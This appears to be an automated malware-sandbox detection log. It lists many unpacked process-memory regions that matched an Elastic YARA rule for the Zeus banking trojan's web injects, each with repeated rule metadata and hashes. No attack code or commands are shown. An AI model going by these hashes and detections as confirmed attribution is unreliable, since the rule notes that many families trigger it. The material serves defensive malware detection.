Source: 2.3.svchost.exe.f280000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 22.2.nPtwtzGyOdAtB.exe.2a52000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.nPtwtzGyOdAtB.exe.29f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.886000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nPtwtzGyOdAtB.exe.2d80000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nPtwtzGyOdAtB.exe.1202000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.33.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.47.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 15.2.nPtwtzGyOdAtB.exe.2e20000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.21.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.ed00000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.49.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.45.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.881000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
The rule above matched in each of the following sources:
Source: 6.2.nPtwtzGyOdAtB.exe.1380000.2.unpack, type: UNPACKEDPE
Source: 32.2.nPtwtzGyOdAtB.exe.2840000.2.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.50.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.51.raw.unpack, type: UNPACKEDPE
Source: 5.2.nPtwtzGyOdAtB.exe.1410000.2.unpack, type: UNPACKEDPE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.46.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.2d30000.16.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.25.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.2d30000.14.unpack, type: UNPACKEDPE
Source: 2.2.svchost.exe.2cd1c00.4.unpack, type: UNPACKEDPE
Source: 32.2.nPtwtzGyOdAtB.exe.2840000.2.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.23.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.36.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.26.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.30.unpack, type: UNPACKEDPE
Source: 22.2.nPtwtzGyOdAtB.exe.2cf0000.2.raw.unpack, type: UNPACKEDPE
Source: 13.2.nPtwtzGyOdAtB.exe.3160000.2.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.52.unpack, type: UNPACKEDPE
Source: 2.2.svchost.exe.29f3c00.3.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.886000.0.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.43.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.29.unpack, type: UNPACKEDPE
Source: 20.2.nPtwtzGyOdAtB.exe.13a2000.1.raw.unpack, type: UNPACKEDPE
Source: 2.2.svchost.exe.29f3c00.3.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.44.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.48.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.37.raw.unpack, type: UNPACKEDPE
Source: 28.2.nPtwtzGyOdAtB.exe.1012000.1.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.43.raw.unpack, type: UNPACKEDPE
Source: 10.2.nPtwtzGyOdAtB.exe.3210000.2.unpack, type: UNPACKEDPE
Source: 35.2.nPtwtzGyOdAtB.exe.f70000.2.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.2d30000.8.unpack, type: UNPACKEDPE
Source: 35.2.nPtwtzGyOdAtB.exe.f12000.1.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.27.raw.unpack, type: UNPACKEDPE
Source: 2.2.svchost.exe.29a2000.2.unpack, type: UNPACKEDPE
Source: 30.2.nPtwtzGyOdAtB.exe.2ab2000.1.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.5830000.17.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.35.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.23.raw.unpack, type: UNPACKEDPE
Source: 22.2.nPtwtzGyOdAtB.exe.2a52000.1.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.2d30000.19.raw.unpack, type: UNPACKEDPE
Source: 10.2.nPtwtzGyOdAtB.exe.3072000.1.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.39.raw.unpack, type: UNPACKEDPE
Source: 38.2.nPtwtzGyOdAtB.exe.2c02000.1.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.2d30000.13.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.2d30000.16.unpack, type: UNPACKEDPE
Source: 15.2.nPtwtzGyOdAtB.exe.2e20000.2.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.40.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.41.unpack, type: UNPACKEDPE
Source: 0.2.WlCVLbzNph.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: 2.3.svchost.exe.f280000.31.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 30.2.nPtwtzGyOdAtB.exe.2ab2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.26.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.41.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 6.2.nPtwtzGyOdAtB.exe.1322000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 5.2.nPtwtzGyOdAtB.exe.1410000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 10.2.nPtwtzGyOdAtB.exe.3072000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.ed00000.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2d30000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.f280000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.4200000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0.2.WlCVLbzNph.exe.407000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
